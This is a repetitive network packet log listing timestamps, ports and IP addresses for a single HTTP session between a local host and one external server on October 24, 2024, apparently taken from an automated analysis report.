Oct 24, 2024 19:29:08.603188038 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603199005 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603213072 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603224993 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.603260040 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.603420973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603451014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603463888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603475094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603477955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.603490114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603502989 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603513002 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.603516102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603530884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603542089 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603547096 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.603554964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603569031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603579998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603590965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.603591919 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603606939 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603619099 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.603619099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603655100 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.603681087 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.603780031 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603790998 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603807926 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603821993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603833914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603847027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603853941 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.603861094 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603880882 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.603909016 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.603938103 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.604280949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604345083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.604384899 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604409933 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604433060 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604444027 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.604453087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604470968 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604487896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604504108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604513884 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.604520082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604533911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.604537964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604556084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604564905 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.604572058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604588032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604604006 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604613066 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.604620934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604636908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604645014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.604655027 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604671001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604671955 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.604687929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604698896 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.604705095 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604722023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604727983 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.604739904 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604757071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604764938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.604773045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604801893 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.604825974 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.604933977 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604950905 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604968071 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.604979038 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.604984999 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605000973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605016947 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605017900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.605034113 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605042934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605056047 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.605074883 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605089903 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605104923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.605106115 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605123997 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605140924 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605140924 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.605160952 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605160952 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.605178118 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605189085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.605195045 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605212927 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605228901 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605232954 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.605246067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605261087 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605278015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605281115 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.605294943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605309963 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.605312109 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605329037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605334997 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.605345964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605360031 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.605362892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605380058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605396032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605400085 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.605452061 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.605704069 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605721951 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605736017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.605747938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.605789900 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.620193958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.620238066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.620253086 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.620275021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.620304108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.620357037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.620374918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.620389938 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.620403051 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.620405912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.620424986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.620438099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.620440006 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.620454073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.620486021 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.620510101 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.629935026 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.629959106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.629995108 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.630012989 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.630014896 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.630032063 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.630047083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.630049944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.630064964 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.630081892 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.630096912 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.630098104 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.630115032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.630124092 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.630145073 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.630181074 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.705276012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.705317020 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.705334902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.705351114 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.705368996 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.705384970 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.705403090 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.705434084 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.705451012 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.705451965 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.705466986 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.705483913 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.705499887 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.705506086 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.705517054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.705534935 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.705581903 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.705590010 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.705604076 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.705631971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.705667973 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706101894 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706136942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706152916 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706160069 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706182957 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706204891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706243992 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706259966 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706275940 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706286907 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706293106 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706315041 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706355095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706357002 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706378937 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706393003 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706444979 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706463099 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706479073 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706495047 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706510067 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706510067 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706526995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706548929 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706592083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706612110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706643105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706654072 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706659079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706691980 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706710100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706712961 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706727028 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706746101 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706754923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706774950 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706784964 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706792116 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706805944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706830978 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706844091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706852913 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706861973 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706876993 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706892014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706923962 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.706928015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706944942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706960917 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.706970930 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.707010984 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.707103014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.707140923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.707144976 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.707156897 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.707184076 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.707207918 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.707274914 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.707292080 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.707305908 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.707326889 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.707335949 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.707351923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.707398891 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.708645105 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.708661079 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.708676100 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.708719969 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.708743095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.708755016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.708771944 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.708787918 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.708808899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.708810091 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.708827972 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.708852053 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.708862066 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.708884001 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.708893061 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.708900928 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.708910942 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.708977938 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709000111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709101915 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709119081 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709134102 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709148884 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709155083 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709167004 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709182024 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709197998 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709201097 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709216118 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709218025 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709235907 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709239960 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709255934 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709283113 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709314108 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709481955 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709497929 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709511995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709527016 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709528923 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709543943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709554911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709561110 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709578037 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709593058 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709597111 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709609032 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709618092 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709635019 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709650040 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709666014 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709682941 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709698915 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709726095 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709775925 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709790945 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709816933 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709853888 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709856033 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709871054 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709887981 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709896088 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709904909 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.709917068 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709940910 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.709965944 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.739341021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.739356995 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.739372015 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.739386082 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.739403009 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.739418030 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.739434958 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.739435911 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.739449978 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.739461899 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.739516020 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.747823954 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.747840881 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.747855902 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.747910023 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.747925043 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.747941017 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.747941971 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.747961044 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.747968912 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.747977972 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.747997046 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.748044014 CEST	49730	80	192.168.2.4	185.215.113.37
Oct 24, 2024 19:29:08.748049021 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.748065948 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.748081923 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.748096943 CEST	80	49730	185.215.113.37	192.168.2.4
Oct 24, 2024 19:29:08.748099089 CEST	49730	80	192.168.2.4	185.215.113.37
